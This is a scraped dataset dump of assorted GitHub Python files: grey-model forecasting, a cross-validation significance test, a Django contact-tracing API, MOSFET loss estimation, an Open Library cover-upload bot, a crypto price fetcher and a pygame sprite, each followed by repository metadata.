self.x_predition\n\n def GMn(self,nn, n_prediction):\n # x0: 历史数据array形式\n # x1: 一次ago\n # xx1: GM计算累加值\n self.nn = nn\n self.n_prediction = n_prediction\n n = len(self.history_data)\n self.history_data = np.array(self.history_data)\n self.history_data_ago = np.array([sum(self.history_data[0:i + 1]) for i in range(n)])\n B = np.zeros([n - 1, 2])\n Y = np.zeros([n - 1, 1])\n for i in range(0, n - 1):\n B[i][0] = -0.5 * (self.history_data_ago[i] + self.history_data_ago[i + 1])\n B[i][1] = 1\n Y[i][0] = self.history_data[i + 1]\n # 计算GM(1,1)微分方程的参数a和b\n A = np.linalg.inv(B.T.dot(B)).dot(B.T).dot(Y)\n self.a = A[0][0]\n self.b = A[1][0]\n\n # 进行GMn预测\n self.x_predition = self.GMn_prediction()\n error = np.ones(n)\n for i in range(n):\n error[i] = self.history_data[i] - self.x_predition[i]\n\n error_predict_1 = self.Fourierseries(error)\n error_predict_2 = self.exponentialsmoothing(error, error_predict_1)\n # print(self.x_predition[1:self.n_prediction])\n # print(error_predict_1[0:self.n_prediction-1])\n # print(error_predict_2[0:self.n_prediction-1])\n x_prediction_final = np.zeros(len(self.x_predition)) # 初始化 final\n x_prediction_final[0] = self.history_data[0]\n error_predict_1 = np.insert(error_predict_1,0,0)\n error_predict_2 = np.insert(error_predict_2, 0, 0)\n x_prediction_final = self.x_predition + error_predict_1 + error_predict_2\n\n return x_prediction_final, self.x_predition, error_predict_1, error_predict_2\n\n\n def Fourierseries(self, error, ka=4):\n # 傅里叶变换模拟一阶误差\n # n: 数据数量\n # ka: a&b总数,2的倍数\n # error: 第一次预测error误差\n n = len(self.history_data)\n error = np.delete(error, 0)\n T = n - 1\n P = np.zeros([n - 1, ka + 1])\n P[:, 0] = 1 / 2 # 赋值第一列\n for i in range(2, n + 1):\n kaa = 1\n for j in range(1, ka, 2): # 采用2的间隔,所以1 3 5 7 9\n P[i - 2, j] = math.cos(2 * math.pi * kaa / T * i)\n P[i - 2, j + 1] = math.sin(2 * math.pi * kaa / T * i)\n kaa += 1\n C = np.linalg.inv(P.T.dot(P)).dot(P.T).dot(error)\n error_predict_1 = np.ones(self.n_prediction - 1)\n for k in range(2, self.n_prediction + 1):\n error_predict_1[k - 2] = 0 # 初始化预测值\n ii = 1\n for i in range(1, ka, 2):\n error_predict_1[k - 2] = error_predict_1[k - 2] + C[i] * math.cos(2 * math.pi * ii / T * k) + \\\n C[i + 1] * math.sin(2 * math.pi * ii / T * k)\n ii += 1\n error_predict_1[k - 2] += 1 / 2 * C[0]\n\n return error_predict_1\n\n def exponentialsmoothing(self, error, error_predict_1, alpha=0.5):\n\n\n # 采用一次平滑法\n # error: 一阶实际误差,\n # error_predict_1: 一阶模拟误差\n # alpha: 加权权重值\n error = np.delete(error, 0) # 为了方便比对error,删除error第一项\n n = len(error)\n error_predict_1 = np.delete(error_predict_1, list(range(n,self.n_prediction-1))) #因为预测error多了一项\n error_2 = error - error_predict_1\n error_predict_2 = np.zeros(self.n_prediction-1)\n error_predict_2[0] = error_2[0]\n for i in range(0, self.n_prediction-1):\n if i == 0:\n error_predict_2[i] = alpha * error_2[0] + (1 - alpha) * error_predict_2[0]\n else:\n error_predict_2[i] = alpha * error_2[i-1] + (1 - alpha) * error_predict_2[i-1] # 这部导致了其只能预测下一个输入,不能多个\n\n return error_predict_2\n\n\n\nif __name__ == '__main__':\n history_data = [132, 92, 118, 130, 187]\n nn = MFGMnF(history_data)\n x_prediction_final, x_predition, error_predict_1, error_predict_2 = nn.GMn(3, 6)\n print(x_prediction_final, '\\n' ,x_predition, '\\n' ,error_predict_1, '\\n' ,error_predict_2)\n\n\n threshold = 1.0e-2\n # x1_data = np.random.randn(100).astype(np.float32)\n # x2_data = np.random.randn(100).astype(np.float32)\n # x3_data = np.random.randn(100).astype(np.float32)\n # y_data = x1_data*2 + x2_data*3 + x3_data*4 + 1.5\n\n weight1 = tf.Variable(1.)\n weight2 = tf.Variable(1.)\n weight3 = tf.Variable(1.)\n bias = tf.constant([0.])\n\n x1_ = tf.placeholder(tf.float32)\n x2_ = tf.placeholder(tf.float32)\n x3_ = tf.placeholder(tf.float32)\n y_ = tf.placeholder(tf.float32)\n\n y_model = tf.add(tf.add(tf.multiply(x1_, weight1), tf.add(tf.multiply(x2_, weight2), tf.multiply(x3_, weight3))), bias)\n loss = tf.reduce_mean(tf.pow((y_model - y_), 2))\n\n train_op = tf.train.GradientDescentOptimizer(0.01).minimize(loss)\n\n sess = tf.Session()\n init = tf.global_variables_initializer()\n sess.run(init)\n flag = 1\n while(flag):\n for (x,y) in zip(zip(x_predition, error_predict_1, error_predict_2), x_prediction_final):\n sess.run(train_op, feed_dict={x1_: x[0], x2_: x[1], x3_: x[2], y_: y})\n print('weihgt1: ', weight1.eval(sess), 'weihgt2: ', weight2.eval(sess), 'weihgt3: ', weight3.eval(sess))\n\n if sess.run(loss, feed_dict={x1_: x[0], x2_: x[1], x3_: x[2], y_: y}) <= threshold:\n flag = 0\n\n print('weihgt1: ', weight1.eval(sess), 'weihgt2: ', weight2.eval(sess), 'weihgt3: ', weight3.eval(sess))\n\n\n #\n # threshold = 1.0e-2\n # x1_data = np.random.randn(100).astype(np.float32)\n # x2_data = np.random.randn(100).astype(np.float32)\n #\n # y_data = x1_data*2 + x2_data*3 + 1.5\n #\n # weight1 = tf.Variable(1.)\n # weight2 = tf.Variable(1.)\n #\n # bias = tf.Variable(1.)\n #\n # x1_ = tf.placeholder(tf.float32)\n # x2_ = tf.placeholder(tf.float32)\n #\n # y_ = tf.placeholder(tf.float32)\n #\n # y_model = tf.add(tf.add(tf.multiply(x1_, weight1), tf.multiply(x2_, weight2)), bias)\n # loss = tf.reduce_mean(tf.pow((y_model - y_), 2))\n #\n # train_op = tf.train.GradientDescentOptimizer(0.01).minimize(loss)\n #\n # sess = tf.Session()\n # init = tf.global_variables_initializer()\n # sess.run(init)\n # flag = 1\n # while(flag):\n # for (x,y) in zip(zip(x1_data, x2_data), y_data):\n # sess.run(train_op, feed_dict={x1_: x[0], x2_: x[1], y_: y})\n # if sess.run(loss, feed_dict={x1_: x[0], x2_: x[1], y_: y}) <= threshold:\n # flag = 0\n #\n # print('weihgt1: ', weight1.eval(sess), 'weihgt2: ', weight2.eval(sess),'bias: ', bias.eval(sess))\n\n\n\n\n","repo_name":"YeBo0807/GM","sub_path":"MFGMnF_3.py","file_name":"MFGMnF_3.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8030011623","text":"\r\n\r\n# =============================================================================\r\n# #5x2 CV Significance test\r\n# =============================================================================\r\n\r\n# imports\r\nimport numpy as np\r\nimport numpy.random as rd\r\nimport pandas as pd\r\nfrom scipy.stats import t\r\n\r\n\r\ndef test(scores1, scores2):\r\n # transform to array\r\n s1, s2 = np.array(scores1), np.array(scores2)\r\n diff = s1-s2\r\n # difference of first fold in first iteration\r\n p_1_1 = diff[0] \r\n # calculate mean for each of the 5 fold = 5 means\r\n p_bar = [((diff[i] + diff[i+1])/2) for i in range(0, 9, 2)] \r\n # compute the variance estimate of each fold = 5 variances\r\n p_sig = [(np.power((diff[i] - p_bar[t]), 2) + np.power((diff[i+1] - p_bar[t]), 2)) for i, t in zip(range(0, 9, 2), range(5))]\r\n # calculate the mean of the variances\r\n sigm = np.mean(np.array(p_sig))\r\n # compute the t-value as proposed by diettriech\r\n t_val = p_1_1 / np.sqrt(sigm)\r\n p_val = 2*(t.cdf(-abs(t_val), 5))\r\n # create dataframe with all values\r\n data = p_val#pd.DataFrame([[t_val], [p_val]], columns=[name12])\r\n # return list with mean1, mean2 \r\n return data\r\n\r\n\r\ndef pTable(fitTlist):\r\n # create names\r\n r_names = ['Rand', 'CTB', 'CTPB', 'DEGL']\r\n c_names = ['MERGE', 'DEGL', 'CTPB', 'CTB']\r\n # create dataframe\r\n data = pd.DataFrame(columns=c_names, index=r_names)\r\n # create combinations\r\n comb = [(0, 4), (0, 3), (0, 2), (0, 1), (1, 4), (1, 3), (1, 2), (2, 4), (2, 3), (3, 4)]\r\n # fill dataframe\r\n for co in comb:\r\n x, y = co\r\n s1, s2 = fitTlist[x], fitTlist[y]\r\n p_val = test(s1, s2)\r\n data.iloc[x, np.abs(y-4)] = p_val\r\n # return table\r\n return data \r\n \r\n \r\ndef summary(fitList):\r\n # create names\r\n r_names = ['RAND', 'CTB', 'CTPB', 'DEGL', 'MERGE'] \r\n c_names = ['Best', 'Median', 'Worst', 'Mean', 'SD'] \r\n # create dataframe\r\n data = pd.DataFrame(columns=c_names, index=r_names) \r\n for i in range(5):\r\n fit = fitList[i]\r\n data.iloc[i, 0] = np.min(fit)\r\n data.iloc[i, 1] = np.median(fit)\r\n data.iloc[i, 2] = np.max(fit)\r\n data.iloc[i, 3] = np.mean(fit)\r\n data.iloc[i, 4] = np.std(fit)\r\n # return dataframe\r\n return data\r\n \r\n \r\n \r\n \r\n\r\n\r\n","repo_name":"unibasPP/Optimizing-Autoencoders-For-Dimensionality-Reduction-An-Evolutionary-Approach","sub_path":"Experiments/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73158407184","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import Profile, Interaction\nfrom .serializers import UserSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass UserRecordView(APIView):\n \"\"\"\n API View to create or get a list of all the registered\n users. GET request returns the registered users whereas\n a POST request allows to create a new user.\n \"\"\"\n permission_classes = [AllowAny]\n\n def post(self, request):\n serializer = UserSerializer(data=request.data)\n email = request.data['email']\n query = User.objects.filter(email=email)\n print(query)\n if serializer.is_valid() and len(query) == 0:\n serializer.create(validated_data=request.data)\n return Response(\n serializer.data,\n status=status.HTTP_201_CREATED\n )\n return Response(\n {\n \"error\": True,\n \"error_msg\": serializer.error_messages,\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n\nfrom datetime import datetime\nclass StatusView(APIView):\n \"\"\"\n API View to get or update current status of a user.\n GET request returns the status of a user and if there is an emergency.\n POST request updates whether user is infected, if there is an emergency\n as well as loading new interactions into the database\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n profile = Profile.objects.filter(user=user)[0]\n contact = profile.contact \n unconfirmed_contact = profile.unconfirmed_contact \n profile.contact = False\n profile.unconfirmed_contact = False\n profile.save()\n\n count_confirmed, count_unconfirmed, count_interactions = profile.statistics()\n\n print(\"they are {} ,{}, {}\".format(count_confirmed, count_unconfirmed, count_interactions ))\n return Response(\n {\n \"contact\": contact,\n \"unconfirmed_contact\": unconfirmed_contact,\n \"identifier\": profile.identifier,\n \"count_confirmed\": count_confirmed,\n \"count_unconfirmed\": count_unconfirmed,\n \"total_interactions\": count_interactions,\n },\n status=status.HTTP_200_OK\n )\n def post(self, request):\n user = request.user\n profile = Profile.objects.filter(user=user)[0]\n data = request.data\n keys = list(data)\n print(\"data\\n\"+str(data))\n print(\"keys\\n\"+str(keys))\n if keys == []:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n \"\"\"\n if 'set_identifier' in keys:\n profile.identifier = data['set_identifier']\n profile.save()\n \"\"\"\n if 'infected' in keys and data['infected'] == 'true':\n # set user as infected\n # user can only set themselves as positive\n profile.set_infected()\n # go through all interactions and check for contact with infected\n profile.infection_check()\n if 'unconfirmed_infected' in keys and data['unconfirmed_infected'] == 'true':\n profile.set_unconfirmed_infected()\n profile.unconfirmed_infection_check()\n if 'interactions' in keys:\n # create or update interactions in database\n\n print(\"data is \"+str(data['interactions']))\n print(\"datalist is \"+str(data.lists()))\n\n for contact in data.getlist('interactions'):\n # find user by uuid\n print(\"contact is \" + contact)\n print('-')\n query = Profile.objects.filter(identifier=contact)\n # todo check for earlier interactions instead of creating new ones\n user1 = user\n profile1 = profile\n if len(query) == 0:\n continue\n user2 = query[0].user\n profile2 = Profile.objects.filter(user=user2)[0]\n # first interaction between users\n if profile2.infected:\n profile1.set_contact()\n if profile1.infected:\n profile2.set_contact()\n \n # look for earlier interaction between users\n inter_query1 = Interaction.objects.filter(user1=user1, user2=user2)\n inter_query2 = Interaction.objects.filter(user1=user2, user2=user1)\n if len(inter_query1) == 1:\n inter = inter_query1[0]\n #inter.set_date(date=contact['date'])\n inter.set_date()\n elif len(inter_query2) == 1:\n inter = inter_query2[0]\n #inter.set_date(date=contact['date'])\n inter.set_date()\n else: \n # first time interacting, create new entry\n inter = Interaction.objects.create(user1=user, user2=user2)\n inter.set_date()\n \n\n return Response(status=status.HTTP_202_ACCEPTED)\n\n","repo_name":"Lemnver/softdev_contact_tracing","sub_path":"server/enviroment/ctrace/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70568060626","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# get_ipython().run_line_magic('matplotlib', 'inline')\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.patches as patches\nsns.set(style=\"darkgrid\")\n\n\n\n\n#validated\ndef Rdson_temp(Rdson_25,Rdson_125,Tj):\n alpha=((Rdson_125/Rdson_25)**(1/100)-1)*100\n Rdson_Tj=Rdson_25*(1+alpha/100)**(Tj-25)\n return Rdson_Tj\n\n\n\n#validated\ndef Coss_sw_losses(Coss,Vds,fsw):\n return Coss*Vds**2*fsw/2\n\n\n\n\n#validated\ndef gate_sw_losses(Qg,Vdr,fsw):\n return Qg*Vdr*fsw\n\n\n# In[5]:\n\n\n#validated\ndef sw_losses(Vds,Ids,fsw,Qg,Idr):\n#based on fairchild application note\n return Vds*Ids/2*fsw*Qg/Idr\n\n\n# In[6]:\n\n\n#validated\ndef cond_losses(Rdson,Irms):\n return Rdson*Irms**2\n\n\n# In[7]:\n\n\n#validated\ndef Id_max_T(Id_max_25,Id_max_100,Tj):\n return Id_max_25+(Id_max_100-Id_max_25)/(100-25)*(Tj-25)\n\n\n# In[8]:\n\n\n# MOSFET data\nMOSFETs=pd.read_excel(r'.\\Space Components.xls',sheet_name=\"MOSFETs\")\nMOSFETs.tail()\n\n\n# In[58]:\n\n\n#Validated\n\ndef opt_MOSFET(Vds,Id,Irms,ZVS,ZCS,Vds_sw_on,Vds_sw_off,Ids_sw_on,Ids_sw_off,Vdr,Idr,fsw,To):\n Pmos_opt=100000\n sel=666\n for i in MOSFETs.index:\n\n #For consistency with MathCad, which uses end as closing indentifier. Not necessary in Python\n # and used to avoid an error.\n if (MOSFETs['Part'][i]==\"end\"):\n break\n if (MOSFETs['Coss (pF)'][i]==\"NP\" or MOSFETs['Qg (nC)'][i]==\"NP\" or MOSFETs['Rth jc (oC/W)'][i]==\"NP\"):\n continue\n Coss=MOSFETs['Coss (pF)'][i]*10**-12\n Qg=MOSFETs['Qg (nC)'][i]*10**-9\n\n if (MOSFETs['Vds (V)'][i]Tj+0.1):\n Tj=Tj+0.1\n Rdson=Rdson_temp(MOSFETs['Rdson (ohms @25oC)'][i],MOSFETs['Rdson (ohms @125oC)'][i],Tj)\n Pmos_cond=cond_losses(Rdson,Irms)\n Pmos_tot=Pmos_cond+Pmos_sw+Pmos_gate+Pmos_coss\n Tj_end=To+Pmos_tot*MOSFETs['Rth jc (oC/W)'][i]\n if (Tj_end>MOSFETs['Tj_max (oC)'][i]):\n break\n\n if (Tj_end>MOSFETs['Tj_max (oC)'][i]):\n continue\n\n if ((Id_max_T(MOSFETs['Id (A @25oC)'][i],MOSFETs['Id (A @100oC)'][i],Tj_end) OpenLibrary:\n return OpenLibrary(\n credentials=config.Credentials(\n access=os.environ[\"OL_ACCESS_KEY\"], secret=os.environ[\"OL_SECRET_KEY\"]\n )\n )\n\n\nclass EditionCoverData(SQLModel, table=True):\n isbn_13: str = Field(default=None, primary_key=True)\n cover_exists: bool = Field(default=False)\n\n\nengine = create_engine(\"sqlite:///bwb-cover-bot.sqlite\", echo=False)\nSQLModel.metadata.create_all(engine)\ndb_session = Session(engine)\n\n\ndef update_cover_for_edition(\n edition_olid: str,\n file_name: str,\n cover_data: bytes,\n mime_type: str,\n ol: OpenLibrary,\n) -> bool:\n form_data_body = {\n \"file\": (file_name, cover_data, mime_type),\n \"url\": (None, \"https://\"),\n \"upload\": (None, \"Submit\"),\n }\n resp = ol.session.post(\n f\"https://openlibrary.org/books/{edition_olid}/-/add-cover\",\n files=form_data_body,\n )\n is_update_success: bool = resp.ok and \"Saved!\" in resp.text\n return is_update_success\n\n\ndef is_cover_already_stored(isbn_13: str) -> bool:\n statement = select(EditionCoverData).where(EditionCoverData.isbn_13 == isbn_13)\n edition_cover_data = db_session.execute(statement).first()\n return (\n len(edition_cover_data or []) == 1\n and edition_cover_data[0].cover_exists is True\n )\n\n\ndef verify_and_update_cover(\n isbn_13: str, archive_contents: ZipFile, ol: OpenLibrary\n) -> bool:\n if is_cover_already_stored(isbn_13):\n logging.info(f\"cover exists in dump for {isbn_13}\")\n return False\n\n ol_edition = ol.Edition.get(isbn=isbn_13)\n if not ol_edition:\n return False\n\n edition_olid = ol_edition.olid\n cover_exists = getattr(ol_edition, \"covers\", None)\n if cover_exists:\n db_session.bulk_save_objects(\n [EditionCoverData(isbn_13=isbn_13, cover_exists=True)]\n )\n db_session.commit()\n logging.info(f\"cover exists in OL for {isbn_13}\")\n return False\n\n is_success = update_cover_for_edition(\n edition_olid=edition_olid,\n cover_data=archive_contents.read(f\"{isbn_13}.jpg\"),\n file_name=f\"{isbn_13}.jpg\",\n mime_type=\"image/jpeg\",\n ol=ol,\n )\n\n db_session.bulk_save_objects(\n [EditionCoverData(isbn_13=isbn_13, cover_exists=is_success)]\n )\n db_session.commit()\n logging.info(f\"cover update status {is_success} for {isbn_13}\")\n\n return is_success\n\n\ndef parser_for_zip_with_isbns(cover_zip_path: str, ol: OpenLibrary) -> int:\n logging.info(f\"start time: {datetime.now().timestamp()} for {cover_zip_path}\")\n archive_contents = ZipFile(cover_zip_path, \"r\")\n file_list: list[ZipInfo] = archive_contents.filelist\n\n verified_and_updated_count = 0\n processed_file_list = []\n for file in file_list:\n logging.info(\n f\"processing {file.filename}, processed {len(processed_file_list)} files\"\n )\n try:\n isbn_of_file: str = file.filename.split(\".\")[0]\n is_success = verify_and_update_cover(isbn_of_file, archive_contents, ol)\n if is_success:\n verified_and_updated_count += 1\n processed_file_list.append(processed_file_list)\n except Exception as e:\n logging.error(\n f\"file: {file.filename}, zip path: {cover_zip_path}. Error: {e}\"\n )\n\n logging.info(f\"end time: {datetime.now().timestamp()} for {cover_zip_path}\")\n return verified_and_updated_count\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n if len(args) != 2:\n raise Exception(\"python main.py \")\n\n ol = get_ol()\n\n user_provided_path = args[1]\n zip_paths = (\n [\n os.path.join(user_provided_path, f)\n for f in os.listdir(user_provided_path)\n if f.endswith(\".zip\")\n ]\n if os.path.isdir(user_provided_path)\n else [user_provided_path]\n )\n for zip_path in zip_paths:\n logging.info(f\"Processing: {zip_path}\")\n verified_and_updated_count = parser_for_zip_with_isbns(zip_path, ol)\n logging.info(f\"Verified and updated {verified_and_updated_count} ISBNs\")\n","repo_name":"internetarchive/openlibrary-bots","sub_path":"BWBCoverBot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"48"} +{"seq_id":"11523396342","text":"#coding=utf-8\nfrom flask import Blueprint, jsonify, request\nfrom model.type import FailResp, SuccessResp\nfrom db.select import select\n\nread = Blueprint('read', __name__)\n\n@read.route(\"/api/read\", methods=['GET'])\ndef index():\n city = request.args.get('city')\n if city == \"\":\n return jsonify(FailResp())\n data = select(city)\n return jsonify(SuccessResp(data))\n\n\n","repo_name":"Muxxs/wuhan2020_api","sub_path":"control/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"} +{"seq_id":"24932419576","text":"from django.db import models\nimport requests, json\nimport time\nfrom datetime import datetime\n\n\n#Coinbase Exchange\ncoinbase_btc_buy_url = \"https://api.coinbase.com/v2/prices/BTC-USD/buy\"\ncoinbase_btc_sell_url = \"https://api.coinbase.com/v2/prices/BTC-USD/sell\"\ncoinbase_eth_buy_url = \"https://api.coinbase.com/v2/prices/ETH-USD/buy\"\ncoinbase_eth_sell_url = \"https://api.coinbase.com/v2/prices/ETH-USD/sell\"\n\nresponse1 = requests.get(coinbase_btc_buy_url)\nresponse2 = requests.get(coinbase_btc_sell_url)\nresponse3 = requests.get(coinbase_eth_buy_url)\nresponse4 = requests.get(coinbase_eth_sell_url)\n\nbtc_buy_price = response1.json()\nbtc_sell_price = response2.json()\neth_buy_price = response3.json()\neth_sell_price = response4.json()\n\n#Gemini Exchange\nbase_url = \"https://api.gemini.com/v1\"\nbtc_response = requests.get(base_url + \"/pubticker/btcusd\")\nbtc_data = btc_response.json()\neth_response = requests.get(base_url + \"/pubticker/ethusd\")\neth_data = eth_response.json()\n\nclass BitcoinPrices:\n coinbase_btc_buy_price = btc_buy_price['data']['amount']\n coinbase_btc_sell_price = btc_sell_price['data']['amount']\n gemini_btc_buy_price = btc_data['bid']\n gemini_btc_sell_price =btc_data['ask']\n\n\n def __str__(self):\n\n return \"coinbase_btc_buy_price: \" + btc_buy_price['data']['amount'] + \"\\ncoinbase_btc_sell_price: \" +btc_sell_price['data']['amount']+\"\\ngemini_btc_buy_price: \" + btc_data['bid']+\"\\ngemini_btc_sell_price: \"+ btc_data['ask']\n\n\n\n\nclass EthereumPrices:\n coinbase_eth_buy_price = eth_buy_price['data']['amount']\n coinbase_eth_sell_price = eth_sell_price['data']['amount']\n gemini_eth_buy_price = eth_data['bid']\n gemini_eth_sell_price = eth_data['ask']\n\n\n def __str__(self):\n return \"coinbase_eth_buy_price: \"+eth_buy_price['data']['amount']+\"\\ncoinbase_eth_sell_price: \"+eth_sell_price['data']['amount']+\"\\ngemini_eth_buy_price: \"+eth_data['bid']+\"\\ngemini_eth_sell_price: \"+eth_data['ask']\nif __name__ == '__main__':\n\n print(BitcoinPrices())\n print(\" \")\n print(EthereumPrices())\n","repo_name":"cchristi10/crypto-price-recommend-repository","sub_path":"price_project/price_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32714837055","text":"import sys\nfrom datetime import datetime\n\nif len(sys.argv) > 1:\n date_time = sys.argv[1]\n dt_obj = datetime.strptime(str(date_time) + ' 00:00:01', '%m.%d.%Y %H:%M:%S')\n millisec = dt_obj.timestamp() * 1000\n print(millisec)\nelse:\n print(\" No arguments \")\n\n\n\n","repo_name":"RoundTower-io/epoch_json_utilities","sub_path":"timestamp.py","file_name":"timestamp.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42296719275","text":"# Distributed under the MIT License.\n# See LICENSE.txt for details.\n\nimport unittest\n\nimport numpy as np\n\nfrom spectre.DataStructures import DataVector\nfrom spectre.NumericalAlgorithms.LinearOperators import (\n absolute_truncation_error,\n power_monitors,\n relative_truncation_error,\n)\nfrom spectre.Spectral import (\n Basis,\n Mesh1D,\n Mesh2D,\n Quadrature,\n logical_coordinates,\n)\n\n\nclass TestPowerMonitors(unittest.TestCase):\n # Check the case for a constant function where the power monitors\n # should be given by the first basis function\n def test_power_monitors(self):\n num_points_per_dimension = 4\n\n extent = num_points_per_dimension\n basis = Basis.Legendre\n quadrature = Quadrature.GaussLobatto\n mesh = Mesh2D(extent, basis, quadrature)\n\n test_vec = np.ones(mesh.number_of_grid_points())\n\n test_array = power_monitors(test_vec, mesh)\n np_test_array = np.asarray(test_array)\n\n check_vec_0 = np.zeros(num_points_per_dimension)\n check_vec_0[0] = 1.0 / np.sqrt(num_points_per_dimension)\n\n check_vec_1 = np.zeros(num_points_per_dimension)\n check_vec_1[0] = 1.0 / np.sqrt(num_points_per_dimension)\n\n np_check_array = np.array([check_vec_0, check_vec_1])\n\n np.testing.assert_allclose(np_test_array, np_check_array, 1e-12, 1e-12)\n\n # Check that the truncation error for a straight line is consistent with the\n # analytic expectation\n def test_truncation_error(self):\n mesh = Mesh1D(2, Basis.Legendre, Quadrature.GaussLobatto)\n logical_coords = np.array(logical_coordinates(mesh))[0]\n\n # Define the test function\n slope, offset = 0.1, 1.0\n test_data = slope * logical_coords + offset\n\n # For a linear function the slope and offset correspond to the power\n # monitor values\n # The weighted average of the highest modes is\n avg = np.log10(np.abs(slope)) * np.exp(-0.25) + np.log10(\n np.abs(offset)\n ) * np.exp(-0.25)\n avg = avg / (np.exp(-0.25) + np.exp(-0.25))\n expected_relative_truncation_error = np.power(10.0, avg)\n expected_absolute_truncation_error = (\n np.max(np.abs(test_data)) * expected_relative_truncation_error\n )\n\n # Test relative truncation_error\n rel_error = relative_truncation_error(test_data, mesh)\n np.testing.assert_allclose(\n rel_error, expected_relative_truncation_error, 1e-12, 1e-12\n )\n\n # Test absolute truncation_error\n abs_error = absolute_truncation_error(test_data, mesh)\n np.testing.assert_allclose(\n abs_error, expected_absolute_truncation_error, 1e-12, 1e-12\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"sxs-collaboration/spectre","sub_path":"tests/Unit/NumericalAlgorithms/LinearOperators/Python/Test_PowerMonitors.py","file_name":"Test_PowerMonitors.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"48"} +{"seq_id":"21239955956","text":"import pygame\nimport shared\nfrom pygame.sprite import *\n\nclass ChasingNeeb(pygame.sprite.Sprite):\n\t\"\"\" Creates a ChasingNeeb sprite \"\"\"\n\t\t\n\tdef __init__(self):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\t\n\t\tself.font = pygame.font.SysFont(\"Verdana\", 13)\n\t\tself.imageMaster = self.font.render(\":3\",\n\t\t\tTrue, (0,0,0), (0xFF, 0xFF, 0xFF))\n\t\t\n\t\tself.image = self.imageMaster\n\t\tself.rect = self.image.get_rect()\n\t\t\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.width = 75\n\t\tself.height = 43\n\t\tself.rect.topleft = (self.x, self.y)\n\n\t\tself.pressed = False\n\t\t\n\t\t#self.neebFrames = []\t\t\n\t\tself.GOING_UP = 0\n\t\tself.GOING_DOWN = 1\n\t\tself.INACTIVE = 2\n\t\tself.DIE = 3\n\t\tself.WALKING = 4\n\t\tself.RUN_AWAY_FROM_BUFORD = 5\n\t\t\n\t\tself.status = self.INACTIVE\n\t\tself.currentFrameIndex = 0\n\t\tself.frames = []\n\t\t\n\t\t#Number represents amount of frames to puase for walking\n\t\tself.WALK_FAST = 7\n\t\tself.WALK_REGULAR = 15\n\t\tself.WALK_SLOW = 25\n\t\t\n\t\tself.walkSpeed_= self.WALK_FAST\n\t\tself.walkTimer = 0\n\t\t\n\tdef setWalkFast(self):\n\t\tself.walkSpeed_ = self.WALK_FAST\n\t\t\n\tdef setWalkRegular(self):\n\t\tself.walkSpeed_ = self.WALK_REGULAR\n\t\t\n\tdef setWalkSlow(self):\n\t\tself.walkSpeed_ = self.WALK_SLOW\n\t\n\tdef setImage(self, filename):\n\t\tfilepath = shared.path(\"data\", filename)\n\t\timage = shared.loadImage(filepath, True)\n\t\tself.frames = self.__generateNeebAnimation(image)\n\t\tcurrentFrame = len(self.frames) - 1\n\t\tself.imageFrame = self.__setCurrentFrame( currentFrame )\n\n\tdef __setCurrentFrame(self, frame):\n\t\tself.imageMaster = self.frames[frame]\n\t\t\n\tdef setIsBufordClose(self, isClose):\n\t\tif isClose:\n\t\t\tself.status = self.RUN_AWAY_FROM_BUFORD\n\t\telse:\n\t\t\tself.status = self.WALKING\n\n\tdef walkTowardsGirl(self, girl):\n\t\tif ( self.status == self.WALKING ):\n\t\t\tprint(\"RUN TOWARDS!\")\n\t\t\tif (self.isCharacterAbove(girl.y)):\n\t\t\t\tself.y -= 5\n\t\t\telif(self.isCharacterBelow(girl.y)):\n\t\t\t\tself.y += 5\n\t\t\t\t\n\t\t\tif(self.isCharacterLeft(girl.x)):\n\t\t\t\tself.x -=5\n\t\t\telif(self.isCharacterRight(girl.x)):\n\t\t\t\tself.x +=5\n\t\t\t\n\tdef runAwayFromBuford(self, buford):\n\t\tif (self.status == self.RUN_AWAY_FROM_BUFORD):\n\t\t\tprint(\"RUN AWAYYYY!\")\n\t\t\tif (self.isCharacterAbove(buford.y)):\n\t\t\t\tself.y += 10\n\t\t\telif(self.isCharacterBelow(buford.y)):\n\t\t\t\tself.y -= 10\n\t\t\tif(self.isCharacterLeft(buford.x)):\n\t\t\t\tself.x -= 10\n\t\t\telif(self.isCharacterRight(buford.x)):\n\t\t\t\tself.x += 10\n\t\n\tdef isCharacterAbove(self, girlY):\n\t\treturn ( girlY < self.y )\n\t\t\n\tdef isCharacterBelow(self, girlY):\n\t\treturn ( girlY > self.y )\n\t\t\n\tdef isCharacterLeft(self, girlX):\n\t\treturn ( girlX < self.x )\n\t\t\n\tdef isCharacterRight(self, girlX):\n\t\treturn ( girlX > self.x )\n\n\t\"\"\" Generates a set of surfaces to create a neeb growing animation \"\"\"\n\tdef __generateNeebAnimation(self, image):\n\t\timages = 